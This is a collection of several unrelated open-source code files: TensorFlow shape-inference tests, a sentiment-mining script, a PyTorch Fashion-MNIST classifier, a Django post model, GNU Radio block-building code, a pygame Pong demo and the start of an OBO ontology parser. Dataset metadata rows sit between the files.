constant_op.constant(1))
self.assertEqual(tensor_util.constant_value(tf_val), False)
tf_val = math_ops.not_equal(constant_op.constant(1),
constant_op.constant(0))
self.assertEqual(tensor_util.constant_value(tf_val), True)
# Shaped inputs with broadcast semantics.
tf_val = math_ops.not_equal(constant_op.constant([[0, 1]]),
constant_op.constant([[0], [1]]))
c_val = tensor_util.constant_value(tf_val)
self.assertAllEqual(c_val, [[False, True], [True, False]])
class ConstantValueAsShapeTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def testConstant(self):
np_val = np.random.rand(3).astype(np.int32)
tf_val = constant_op.constant(np_val)
self.assertEqual(
tensor_shape.TensorShape(np_val),
tensor_util.constant_value_as_shape(tf_val))
tf_val = constant_op.constant([], dtype=dtypes.int32)
self.assertEqual(
tensor_shape.TensorShape([]),
tensor_util.constant_value_as_shape(tf_val))
@test_util.run_in_graph_and_eager_modes()
def testShape(self):
tf_val = array_ops.shape(constant_op.constant(0.0, shape=[1, 2, 3]))
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual(tensor_shape.TensorShape([1, 2, 3]), c_val)
@test_util.run_in_graph_and_eager_modes()
def testMinusOneBecomesNone(self):
tf_val = constant_op.constant([-1, 1, -1], shape=[3])
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([None, 1, None], c_val.as_list())
def testPack(self):
tf_val = array_ops.stack(
[constant_op.constant(16), 37, array_ops.placeholder(dtypes.int32)])
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None], c_val.as_list())
def testConcat(self):
tf_val = array_ops.concat(
[[16, 37], array_ops.placeholder(
dtypes.int32, shape=(2,))], 0)
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None, None], c_val.as_list())
tf_val = array_ops.concat(
[[16, 37], array_ops.placeholder(
dtypes.int32, shape=(1,)), [48]], 0)
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None, 48], c_val.as_list())
def testSlice(self):
tf_val = array_ops.placeholder(dtypes.int32, shape=(4,))[0:2]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([None, None], c_val.as_list())
# begin:end
tf_val = constant_op.constant([10, 20, 30])[1:3]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([20, 30], c_val.as_list())
# begin:end:stride
tf_val = array_ops.strided_slice(
constant_op.constant([10, 20, 30]), [1], [3], strides=[2])
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([20], c_val.as_list())
# [1, 2, 16, 37, None, 48]
tf_val_orig = array_ops.concat(
[[1, 2, 16, 37], array_ops.placeholder(
dtypes.int32, shape=(1,)), [48]], 0)
# begin: no end
tf_val = tf_val_orig[2:]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 37, None, 48], c_val.as_list())
# begin::negative slice
tf_val = tf_val_orig[2::-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([16, 2, 1], c_val.as_list())
# :end:negative slice
tf_val = tf_val_orig[:1:-2]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([48, 37], c_val.as_list())
# begin:end:negative slice
tf_val = tf_val_orig[3:1:-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, 16], c_val.as_list())
# begin:negative end:slice
tf_val = tf_val_orig[1:-3:1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([2, 16], c_val.as_list())
# negative begin::slice
tf_val = tf_val_orig[-3::1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, None, 48], c_val.as_list())
# negative begin::negative slice
tf_val = tf_val_orig[-3::-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, 16, 2, 1], c_val.as_list())
# negative begin:negative end:negative slice
tf_val = tf_val_orig[-3:-5:-1]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([37, 16], c_val.as_list())
# Do not support shape inference for additional arguments
tf_val = constant_op.constant([10, 20, 30])[...]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual([None, None, None], c_val.as_list())
# Do not support shape inference for tensor slices.
tf_val = constant_op.constant([10, 20, 30])[
array_ops.placeholder(dtypes.int32, shape=()):]
c_val = tensor_util.constant_value_as_shape(tf_val)
self.assertEqual(tensor_shape.unknown_shape(), c_val)
# Do not support shape inference for higher rank
with self.assertRaises(ValueError):
tf_val = constant_op.constant([[10], [20], [30]])[:, 0:]
c_val = tensor_util.constant_value_as_shape(tf_val)
if __name__ == "__main__":
test.main()
| apache-2.0 | 7,437,894,312,507,629,000 | 34.661891 | 121 | 0.604773 | false |
johnthebrave/sentiment-mining | src/nn.py | 1 | 9990 | __author__ = 'alexei'
import gensim
from data_processing.mongo import MongoORM
from data_processing.util import Timer
from pprint import pprint as pp
import nltk
from nltk.stem import WordNetLemmatizer
wnl = WordNetLemmatizer()
from pybrain.datasets import SupervisedDataSet
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.tools.shortcuts import buildNetwork
from pybrain.structure.modules import TanhLayer
import numpy as np
splitters = {"but", "however", "although", "though", "moreover"}
ignore_pos_set = {"c", "e", "p", "t", "w"}
ignore_word_set = {"of", "a", "an", "it", "the", "that", "this", "these", "those", "\\"}
def w2vec_model():
model = gensim.models.Word2Vec.load('../data/w2v_for_rotten.model')
model.init_sims(replace=True)
return model
def miner(text, deps, features, negation):
#, feature_vectors, model):
# pp(text)
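    # Split one tokenized sentence on contrast words ("but", "however", ...),
    # drop stop words and ignored POS categories, record whether the dependency
    # parse contains a negation, and append the cleaned chunk(s) to `features`.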
sentences = []
# vectors = []
current_sentence = []
# current_vec = None
negate = False
for dep in deps:
if dep[0] == 'neg':
negate = True
negation.append(negate)
for j in xrange(len(text)):
word = text[j]
if word in ignore_word_set:
continue
if word in splitters:
if len(current_sentence) > 0:
sentences.append(current_sentence)
# vectors.append(current_vec)
# current_vec = None
current_sentence = []
continue
pos = nltk.pos_tag([word])[0][1].lower()
if pos[0] in ignore_pos_set:
continue
# if word in model:
# if current_vec is None:
# current_vec = model[word]
# else:
# current_vec += model[word]
current_sentence.append(word)
if len(current_sentence) > 0:
sentences.append(current_sentence)
# vectors.append(current_vec)
if len(sentences) > 1:
features.append(sentences)
# feature_vectors.append(current_vec)
else:
features += sentences
# feature_vectors += vectors
def augument_dataset_with_negation():
t = Timer()
mongo = MongoORM("rotten")
phrases = mongo.get_collection("phrases")
for phrase in phrases:
negation = []
idx = 0
while idx < len(phrase["deps"]):
deps = phrase["deps"][idx]
neg = False
for dep in deps:
if dep[0] == 'neg':
neg = True
if neg:
negation.append(True)
else:
negation.append(False)
idx += 1
mongo.update_item("training_set", {"_id": phrase["_id"]}, {"$set": {"neg": negation}})
t.measure("rotten corpus augumented in: ")
def build_rotten_dataset():
t = Timer()
mongo = MongoORM("rotten")
phrases = mongo.get_collection("phrases")
for phrase in phrases:
sentiment = phrase["sentiment"]
features = []
negation = []
idx = 0
while idx < len(phrase["text"]):
miner(phrase["text"][idx], phrase["deps"][idx], features, negation)
idx += 1
if len(features) > 0:
item = {"_id": phrase["_id"],
"features": features,
"neg": negation,
"label": sentiment}
mongo.upsert_item("training_set", item)
t.measure("rotten corpus built in: ")
from pybrain.tools.xml.networkwriter import NetworkWriter
from pybrain.tools.xml.networkreader import NetworkReader
def make_vector(model, feature_list):
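    # Sum the word2vec vectors of all feature words; return None if any word is
    # out of vocabulary so the caller can fall back to another strategy.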
vector = np.zeros(100, dtype="float32")
for feature in feature_list:
if feature in model:
vector += model[feature]
else:
# backoff to naive solution
return None
return vector
def build_training_set():
model = w2vec_model()
t = Timer()
mongo = MongoORM("rotten")
tset = mongo.get_collection("training_set")
ds = SupervisedDataSet(100, 1)
count = 0
for train_set in tset:
features = train_set["features"]
label = int(train_set["label"])
vectors = []
if len(features) > 1:
continue
for feature in features:
if type(feature[0]) is not list:
vector = make_vector(model, feature)
if vector is None:
continue
vectors.append(vector)
ds.addSample(tuple(list(vector)), (label,))
count += 1
else:
continue
# if len(feature) > 2 or type(feature[0][0]) is list:
# print features
# exit(0)
#
# vectors.append(make_vector(model, feature[0]))
# vectors.append(make_vector(model, feature[1]))
t.measure("rotten training set built in: ")
pp("Dataset size for single phrases: " + str(count))
t = Timer()
net = buildNetwork(100, 100, 1, bias=True) #, hiddenclass=TanhLayer)
trainer = BackpropTrainer(net, ds)
trainer.trainUntilConvergence(verbose=True, validationProportion=0.15, maxEpochs=1000000, continueEpochs=10)
t.measure("network train for single phrases: ")
NetworkWriter.writeToFile(net, '../data/single_phrase_nn.xml')
# print net.activateOnDataset(ds)
def test_ann():
net = NetworkReader.readFrom('../data/single_phrase_nn.xml')
model = w2vec_model()
vector = np.zeros(100, dtype="float32")
vector += model["great"]
vector += model["movie"]
    ds2 = SupervisedDataSet(100, 1)
    ds2.addSample(tuple(vector), (4,))  # feed the 100-dim sentence vector directly
print net.activateOnDataset(ds2)
def curiosity_query():
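    # Exploratory check: score each single-chunk phrase against positive/negative
    # word lexicons (plus a negation flag), derive a hand-tuned verdict, and print
    # the phrases where that verdict disagrees with the label by more than one.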
t = Timer()
mongo_rotten = MongoORM("rotten")
mongo_words = MongoORM("words")
tset = mongo_rotten.get_collection("training_set")
count = 0
ds = SupervisedDataSet(6, 1)
negs = {"n't", "not", "nor"}
for train_set in tset:
features = train_set["features"]
if len(features) > 1:
continue
if type(features[0][0]) is list:
continue
score = [0, 0, 0, 0, 0]
if len(train_set["neg"]) != 0:
negation = train_set["neg"][0]
if not negation:
negation = 0
else:
negation = 1
else:
negation = 0
for feature in features[0]:
if feature in negs:
negation = 1
positive = mongo_words.get_item_by_id("positive", feature)
if positive:
score[positive["label"]] += 1
continue
negative = mongo_words.get_item_by_id("negative", feature)
if negative:
score[negative["label"]] += 1
continue
score[2] += 1
score = [negation] + score
ds.addSample(tuple(score), (int(train_set["label"]),))
positive_count = float(score[5]) + float(0.5 * score[4])
negative_count = float(score[1]) + float(0.5 * score[2])
if negative_count == 0 and positive_count == 0:
verdict = 2
elif negative_count > 0 and not negation:
if negative_count > 1.0:
verdict = 0
else:
verdict = 1
elif negative_count > 0 and negation:
verdict = 1
elif positive_count > 0 and negation:
verdict = 1
elif positive_count > 2:
verdict = 4
else:
verdict = 3
if abs(verdict - train_set["label"]) > 1:
# # if count > 10:
pp((positive_count, negative_count))
pp((score, "verdict", verdict, "label", train_set["label"], features))
print
count += 1
if count == 10:
exit(0)
# positive_count = float(score[4]) + float(0.5 * score[3])
# negative_count = float(score[0]) + float(0.5 * score[1])
# negative_count *= 2.5
#
# verdict = 0
# if positive_count > 0 and negative_count > 0:
# if positive_count - negative_count > 0:
# verdict = 3
# elif positive_count - negative_count < 0:
# verdict = 1
# else:
# verdict = 2
# else:
# if positive_count >= 1.0:
# verdict = 4
# elif positive_count > 0:
# verdict = 3
# elif negative_count >= 1.0:
# verdict = 0
# elif negative_count > 0:
# verdict = 1
# else:
# verdict = 2
#
# if score[4] > 2 or score[0] > 2:
# if abs(verdict - train_set["label"]) > 1:
# # if count > 10:
# pp((positive_count, negative_count))
# pp((score, "verdict", verdict, "label", train_set["label"], features))
# print
#
# count += 1
# if count == 20:
# exit(0)
# exit(0)
t.measure("curiosity satisfied in: ")
# ds.saveToFile("greedy_data.xml")
#
# print "sents with no deps: ", count
#
# print len(ds)
# net = buildNetwork(6, 1, 1, bias=True)
# trainer = BackpropTrainer(net, ds)
# trainer.trainUntilConvergence(verbose=True, validationProportion=0.20, maxEpochs=10000, continueEpochs=10)
#
# t.measure("greedy algo: ")
# NetworkWriter.writeToFile(net, '../data/greedy.xml')
def main():
# augument_dataset_with_negation()
# build_rotten_dataset()
# build_training_set()
# curiosity_query()
test_ann()
if __name__ == "__main__":
main() | gpl-2.0 | -3,132,925,131,072,069,600 | 25.571809 | 112 | 0.530831 | false |
m2dsupsdlclass/lectures-labs | labs/08_frameworks/pytorch/fashion_mnist.py | 1 | 7549 | import torch
import torch.nn.functional as F
import torch.nn as nn
from matplotlib.cm import get_cmap
from torch.autograd import Variable
from torch.utils.data import TensorDataset, DataLoader
from torchvision import datasets
from torchvision.transforms import transforms
import matplotlib.pyplot as plt
english_labels = ["T-shirt/top",
"Trouser",
"Pullover",
"Dress",
"Coat",
"Sandal",
"Shirt",
"Sneaker",
"Bag",
"Ankle boot"]
cuda = False
batch_size = 32
lr = 0.01
momentum = 0.9
log_interval = 10
epochs = 6
kwargs = {'num_workers': 1, 'pin_memory': True} if cuda else {}
train_data = datasets.FashionMNIST('data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
]))
train_loader = DataLoader(train_data, batch_size=128, shuffle=False, **kwargs)
# Let's compute the per-image mean and std of the training images, averaged
# over the whole training set. We will use them to normalize the data later on.
n_samples_seen = 0.
mean = 0
std = 0
for train_batch, train_target in train_loader:
batch_size = train_batch.shape[0]
train_batch = train_batch.view(batch_size, -1)
this_mean = torch.mean(train_batch, dim=1)
this_std = torch.sqrt(
torch.mean((train_batch - this_mean[:, None]) ** 2, dim=1))
mean += torch.sum(this_mean, dim=0)
std += torch.sum(this_std, dim=0)
n_samples_seen += batch_size
mean /= n_samples_seen
std /= n_samples_seen
train_data = datasets.FashionMNIST('data', train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=mean,
std=std)]))
test_data = datasets.FashionMNIST('data', train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=mean,
std=std)]))
train_loader = DataLoader(train_data, batch_size=32, shuffle=True,
**kwargs)
test_loader = DataLoader(test_data, batch_size=32, shuffle=False,
**kwargs)
class VGGCell(nn.Module):
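    """A VGG-style block: `depth` 3x3 convolutions, optionally followed by 2x2 max-pooling."""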
def __init__(self, in_channel, out_channel, depth, max_pooling=True):
super(VGGCell, self).__init__()
self.convs = nn.ModuleList()
for i in range(depth):
if i == 0:
self.convs.append(nn.Conv2d(in_channel, out_channel,
kernel_size=(3, 3),
padding=1))
else:
self.convs.append(nn.Conv2d(out_channel, out_channel,
kernel_size=(3, 3),
padding=1))
self.max_pooling = max_pooling
def forward(self, x):
for conv in self.convs:
x = conv(x)
if self.max_pooling:
x = F.max_pool2d(x, kernel_size=(2, 2))
return x
class Model(nn.Module):
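    """Two VGG blocks (1 -> 32 -> 64 channels) with dropout, followed by two fully connected layers."""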
def __init__(self):
super(Model, self).__init__()
vgg1 = VGGCell(1, 32, 1, max_pooling=True)
vgg2 = VGGCell(32, 64, 1, max_pooling=True)
self.vggs = nn.ModuleList([vgg1, vgg2])
self.dropout_2d = nn.Dropout2d(p=0.25)
self.fc1 = nn.Linear(7 * 7 * 64, 256)
self.dropout = nn.Dropout(p=0.5)
self.fc2 = nn.Linear(256, 10)
def forward(self, x):
for vgg in self.vggs:
x = self.dropout_2d(vgg(x))
x = x.view(-1, 7 * 7 * 64)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
# Let's test our model on CPU
model = Model()
img, target = train_data[0]
# n_channel, width, height
print(img.shape)
fig, ax = plt.subplots(1, 1)
ax.imshow(img[0].numpy(), cmap=get_cmap('gray'))
plt.show()
# First dimension should contain batch_size
img = img[None, :]
img = Variable(img)
pred = model(img)
print(target, english_labels[target])
print(pred)
if cuda:
model.cuda()
optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum=momentum)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,
T_max=5,
last_epoch=-1)
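# Cosine-annealed learning rate: decays from `lr` towards zero over T_max epochs
# (the scheduler is stepped once per epoch in the training loop below).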
def train(epoch):
model.train()
train_loss = 0
for batch_idx, (data, target) in enumerate(train_loader):
if cuda:
data, target = data.cuda(), target.cuda()
batch_size = data.shape[0]
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
train_loss += loss.data[0] * batch_size
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch + 1, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data[0]))
    train_loss /= len(train_loader.dataset)
return train_loss
def test():
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
if cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data, volatile=True), Variable(target)
output = model(data)
test_loss += F.nll_loss(output, target, size_average=False).data[0]
# sum up batch loss
_, pred = output.data.max(dim=1)
# get the index of the max log-probability
correct += torch.sum(pred == target.data.long())
test_loss /= len(test_loader.dataset)
test_accuracy = correct / len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f},'
' Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * test_accuracy))
return test_loss, test_accuracy
logs = {'epoch': [], 'train_loss': [], 'test_loss': [],
'test_accuracy': [], 'lr': []}
for epoch in range(epochs):
train_loss = train(epoch)
test_loss, test_accuracy = test()
logs['epoch'].append(epoch)
logs['train_loss'].append(train_loss)
logs['test_loss'].append(test_loss)
logs['test_accuracy'].append(test_accuracy)
logs['lr'].append(optimizer.param_groups[0]['lr'])
scheduler.step(epoch)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(8, 12))
ax1.plot(logs['epoch'], list(zip(logs['train_loss'],
logs['test_loss'],
logs['test_accuracy'])))
ax1.legend(['Train loss', 'Test loss', 'Test accuracy'])
ax2.plot(logs['epoch'], logs['lr'],
label='Learning rate')
ax2.legend()
# Let's see what our model can do
test_img, true_target = test_data[42]
fig, ax = plt.subplots(1, 1)
ax.imshow(test_img[0].numpy(), cmap=get_cmap('gray'))
plt.show()
test_img = test_img[None, :]
if cuda:
test_img = test_img.cuda()
test_img = Variable(test_img, volatile=True)
pred = model(test_img)
_, target = torch.max(pred, dim=1)
target = target.data[0]
print(english_labels[target])
| mit | -6,136,229,963,483,149,000 | 31.821739 | 78 | 0.543913 | false |
arturtamborski/wypok | wypok/posts/models.py | 1 | 1761 | from django.urls import reverse
from django.contrib.auth import get_user_model
from django.db import models
from django.conf import settings
from wypok.validators import FileValidator
from wypok.utils.markup import markup
from wypok.utils.slugify import slugify_max
from sections.models import Section
def posts_attachment_path(instance, filename):
return settings.POSTS_ATTACHMENT_PATH.format(id=instance.id, name=filename)
class PostQuerySet(models.QuerySet):
pass
class Post(models.Model):
class Meta:
ordering = ('-date',)
objects = PostQuerySet.as_manager()
section = models.ForeignKey(Section, on_delete=models.CASCADE)
author = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)
title = models.CharField(max_length=256)
slug = models.SlugField(max_length=32, editable=False)
link = models.URLField(max_length=256, default='', blank=True)
date = models.DateTimeField(auto_now_add=True, editable=False)
content = models.TextField(blank=True)
content_html = models.TextField(editable=False, blank=True)
attachment = models.FileField(max_length=256, blank=True, null=True,
upload_to=posts_attachment_path,
validators=[FileValidator(content_types=settings.POSTS_ALLOWED_CONTENT_TYPES)])
def save(self, *args, **kwargs):
self.slug = slugify_max(self.title, 32)
self.content_html = markup(self.content)
self.full_clean()
super().save(*args, **kwargs)
def __str__(self):
return self.slug
def prettify(self):
return self.title
def get_owner(self):
return self.author
def get_absolute_url(self):
return reverse('sections:posts:detail', args=[self.section, self.id, self.slug])
| mit | -3,024,259,250,169,399,000 | 30.446429 | 88 | 0.707553 | false |
skoslowski/gnuradio | grc/core/blocks/_build.py | 1 | 5788 | # Copyright 2016 Free Software Foundation, Inc.
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
from __future__ import absolute_import
import itertools
import re
from ..Constants import ADVANCED_PARAM_TAB
from ..utils import to_list
from ..Messages import send_warning
from .block import Block
from ._flags import Flags
from ._templates import MakoTemplates
def build(
id,
label="",
category="",
flags="",
documentation="",
value=None,
asserts=None,
parameters=None,
inputs=None,
outputs=None,
templates=None,
cpp_templates=None,
**kwargs
):
block_id = id
cls = type(str(block_id), (Block,), {})
cls.key = block_id
cls.label = label or block_id.title()
cls.category = [cat.strip() for cat in category.split("/") if cat.strip()]
cls.flags = Flags(flags)
if re.match(r"options$|variable|virtual", block_id):
cls.flags.set(Flags.NOT_DSP, Flags.DISABLE_BYPASS)
cls.documentation = {"": documentation.strip("\n\t ").replace("\\\n", "")}
cls.asserts = [_single_mako_expr(a, block_id) for a in to_list(asserts)]
cls.inputs_data = build_ports(inputs, "sink") if inputs else []
cls.outputs_data = build_ports(outputs, "source") if outputs else []
cls.parameters_data = build_params(
parameters or [],
bool(cls.inputs_data),
bool(cls.outputs_data),
cls.flags,
block_id,
)
cls.extra_data = kwargs
templates = templates or {}
cls.templates = MakoTemplates(
imports=templates.get("imports", ""),
make=templates.get("make", ""),
callbacks=templates.get("callbacks", []),
var_make=templates.get("var_make", ""),
)
cpp_templates = cpp_templates or {}
cls.cpp_templates = MakoTemplates(
includes=cpp_templates.get("includes", []),
make=cpp_templates.get("make", ""),
callbacks=cpp_templates.get("callbacks", []),
var_make=cpp_templates.get("var_make", ""),
link=cpp_templates.get("link", []),
translations=cpp_templates.get("translations", []),
declarations=cpp_templates.get("declarations", ""),
)
# todo: MakoTemplates.compile() to check for errors
cls.value = _single_mako_expr(value, block_id)
return cls
def build_ports(ports_raw, direction):
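    # Normalize the raw port definitions: tag each port with its direction, assign
    # sequential ids to ports that do not define one, and reject duplicate ids.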
ports = []
port_ids = set()
stream_port_ids = itertools.count()
for i, port_params in enumerate(ports_raw):
port = port_params.copy()
port["direction"] = direction
port_id = port.setdefault("id", str(next(stream_port_ids)))
if port_id in port_ids:
raise Exception(
'Port id "{}" already exists in {}s'.format(port_id, direction)
)
port_ids.add(port_id)
ports.append(port)
return ports
def build_params(params_raw, have_inputs, have_outputs, flags, block_id):
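    # Assemble the block's parameter list: the built-in params (id, alias, core
    # affinity, buffer sizes, as applicable) come first, then the block-specific
    # params, and finally the comment param.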
params = []
def add_param(**data):
params.append(data)
if flags.SHOW_ID in flags:
add_param(id="id", name="ID", dtype="id", hide="none")
else:
add_param(id="id", name="ID", dtype="id", hide="all")
if not flags.not_dsp:
add_param(
id="alias",
name="Block Alias",
dtype="string",
hide="part",
category=ADVANCED_PARAM_TAB,
)
if have_outputs or have_inputs:
add_param(
id="affinity",
name="Core Affinity",
dtype="int_vector",
hide="part",
category=ADVANCED_PARAM_TAB,
)
if have_outputs:
add_param(
id="minoutbuf",
name="Min Output Buffer",
dtype="int",
hide="part",
default="0",
category=ADVANCED_PARAM_TAB,
)
add_param(
id="maxoutbuf",
name="Max Output Buffer",
dtype="int",
hide="part",
default="0",
category=ADVANCED_PARAM_TAB,
)
base_params_n = {}
for param_data in params_raw:
param_id = param_data["id"]
        if any(p["id"] == param_id for p in params):
raise Exception('Param id "{}" is not unique'.format(param_id))
if "option_attributes" in param_data:
_validate_option_attributes(param_data, block_id)
base_key = param_data.get("base_key", None)
param_data_ext = base_params_n.get(base_key, {}).copy()
param_data_ext.update(param_data)
add_param(**param_data_ext)
base_params_n[param_id] = param_data_ext
add_param(
id="comment",
name="Comment",
dtype="_multiline",
hide="part",
default="",
category=ADVANCED_PARAM_TAB,
)
return params
def _single_mako_expr(value, block_id):
if not value:
return None
value = value.strip()
if not (value.startswith("${") and value.endswith("}")):
raise ValueError("{} is not a mako substitution in {}".format(value, block_id))
return value[2:-1].strip()
def _validate_option_attributes(param_data, block_id):
if param_data["dtype"] != "enum":
send_warning(
"{} - option_attributes are for enums only, ignoring".format(block_id)
)
del param_data["option_attributes"]
else:
for key in list(param_data["option_attributes"].keys()):
if key in dir(str):
del param_data["option_attributes"][key]
send_warning(
'{} - option_attribute "{}" overrides str, ignoring'.format(
block_id, key
)
)
| gpl-3.0 | 5,468,785,309,365,975,000 | 27.234146 | 87 | 0.555632 | false |
LewisSarcasm/PingAI | hello.py | 1 | 1770 | import pygame, sys
from pygame.locals import *
import random
WIDTH = 640
HEIGHT = 480
screen = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)
pygame.display.set_caption("PongAI")
clock = pygame.time.Clock()
balls = []
for _ in range(500):
ball = {
"x": random.randrange(0, WIDTH),
"y": random.randrange(0, HEIGHT),
"xvel": random.randrange(-4, 4),
"yvel": random.randrange(-4, 4),
"r": 10,
"color": (random.randrange(0, 0xFF), random.randrange(0, 0xFF), random.randrange(0, 0xFF))
}
balls.append(ball)
bat = {
"x": 30,
"y": HEIGHT/2,
"width": 10, # actually, half the width and height
"height": 50,
"color": (0xFF, 0xFF, 0xFF)
}
while True:
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
screen.fill((0, 0, 0)) # clear the screen with black
for ball in balls:
pygame.draw.rect(screen, ball["color"], (ball["x"]-ball["r"], ball["y"]-ball["r"], ball["r"]*2, ball["r"]*2), 0)
ball["x"] += ball["xvel"]
ball["y"] += ball["yvel"]
# wall collision
if (ball["xvel"] > 0 and ball["x"] + ball["r"] > WIDTH) or (ball["xvel"] < 0 and ball["x"] - ball["r"] < 0):
ball["xvel"] *= -1
if (ball["yvel"] > 0 and ball["y"] + ball["r"] > HEIGHT) or (ball["yvel"] < 0 and ball["y"] - ball["r"] < 0):
ball["yvel"] *= -1
# bat collision
if (abs(ball["y"] - bat["y"]) < (bat["height"] + ball["r"])) and ((ball["xvel"] > 0 and ball["x"] > WIDTH/2 and ball["x"] + ball["r"] > bat["x"] - bat["width"]) or (ball["xvel"] < 0 and ball["x"] < WIDTH/2 and ball["x"] - ball["r"] < bat["x"] + bat["width"])):
ball["xvel"] *= -1
pygame.draw.rect(screen, bat["color"], (bat["x"]-bat["width"], bat["y"]-bat["height"], bat["width"]*2, bat["height"]*2), 0)
pygame.display.update()
clock.tick(60)
| mit | -7,116,693,056,600,813,000 | 29.517241 | 262 | 0.575141 | false |
ales-erjavec/orange-bio | orangecontrib/bio/ontology.py | 2 | 32024 | """
==============================
OBO Ontology (:mod:`ontology`)
==============================
This module provides an interface for parsing, creating and manipulating of
`OBO ontologies <http://www.obofoundry.org/>`_.
Construct an ontology from scratch with custom terms ::
>>> term = OBOObject("Term", id="foo:bar", name="Foo bar")
>>> print(term)
[Term]
id: foo:bar
name: Foo bar
>>> ontology = OBOOntology()
>>> ontology.add_object(term)
>>> ontology.add_header_tag("created-by", "ales") # add a header tag
>>> from six import StringIO
>>> buffer = StringIO()
>>> ontology.write(buffer) # Save the ontology to a file like object
>>> print(buffer.getvalue()) # Print the contents of the buffer
created-by: ales
<BLANKLINE>
[Term]
id: foo:bar
name: Foo bar
<BLANKLINE>
To load an ontology from a file, pass the file or filename to the
:class:`OBOOntology` constructor or call its load method ::
>>> _ = buffer.seek(0) # rewind
>>> ontology = OBOOntology(buffer)
>>> # Or equivalently
>>> _ = buffer.seek(0) # rewind
>>> ontology = OBOOntology()
>>> ontology.load(buffer)
See the definition of the `.obo file format
<http://www.geneontology.org/GO.format.obo-1_2.shtml>`_.
"""
from __future__ import print_function
import sys
import re
import warnings
import keyword
import operator
from functools import reduce
from collections import defaultdict
import six
from six import StringIO
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
if sys.version_info >= (3,):
intern = sys.intern
#: These are builtin OBO objects present in any ontology by default.
BUILTIN_OBO_OBJECTS = [
"""[Typedef]
id: is_a
name: is_a
range: OBO:TERM_OR_TYPE
domain: OBO:TERM_OR_TYPE
definition: The basic subclassing relationship [OBO:defs]""",
"""[Typedef]
id: disjoint_from
name: disjoint_from
range: OBO:TERM
domain: OBO:TERM
definition: Indicates that two classes are disjoint [OBO:defs]""",
"""[Typedef]
id: instance_of
name: instance_of
range: OBO:TERM
domain: OBO:INSTANCE
definition: Indicates the type of an instance [OBO:defs]""",
"""[Typedef]
id: inverse_of
name: inverse_of
range: OBO:TYPE
domain: OBO:TYPE
definition: Indicates that one relationship type is the inverse of another [OBO:defs]""",
"""[Typedef]
id: union_of
name: union_of
range: OBO:TERM
domain: OBO:TERM
definition: Indicates that a term is the union of several others [OBO:defs]""",
"""[Typedef]
id: intersection_of
name: intersection_of
range: OBO:TERM
domain: OBO:TERM
definition: Indicates that a term is the intersection of several others [OBO:defs]"""
]
def _split_and_strip(string, sep):
"""
Split the `string` by separator `sep` in to two parts and strip
any whitespace between the inner parts.
"""
head, tail = _split_esc(string, sep)
return head.rstrip(" "), tail.lstrip(" ")
def _rsplit_and_strip(string, sep):
"""
Right split the `string` by separator `sep` in to two parts and
strip any whitespace between the inner parts.
"""
head, tail = _rsplit_esc(string, sep)
return head.rstrip(" "), tail.lstrip(" ")
def _find_esc(string, char):
i = string.find(char)
while i != -1:
        if i == 0 or string[i - 1] != "\\":
return i
else:
i = string.find(char, i + 1)
return i
def _rfind_esc(string, char):
i = string.rfind(char)
while i != -1:
        if i == 0 or string[i - 1] != "\\":
return i
else:
i = string.rfind(char, 0, i - 1)
return i
def _split_esc(string, sep, _find_esc=_find_esc):
i = _find_esc(string, sep)
if i != -1:
return string[:i], string[i + 1:]
else:
return string, ""
def _rsplit_esc(string, sep):
i = _rfind_esc(string, sep)
if i != -1:
return string[:i], string[i + 1:]
else:
return string, ""
def parse_tag_value(tag_value_string):
"""
Parse a tag value string and return a four-tuple containing
a (tag, value, modifiers, comment). If comment or modifiers are
not present the corresponding entry will be ``None``.
>>> parse_tag_value("foo: bar {modifier=frob} ! Comment")
('foo', 'bar', 'modifier=frob', 'Comment')
>>> parse_tag_value("foo: bar")
('foo', 'bar', None, None)
>>> parse_tag_value("foo: bar [baz:0] { fizz=buzz } ! Comment")
('foo', 'bar [baz:0]', 'fizz=buzz', 'Comment')
"""
comment = modifiers = None
# First get rid of the comment if present
if _rfind_esc(tag_value_string, "!") != -1:
tag_value_string, comment = _rsplit_and_strip(tag_value_string, "!")
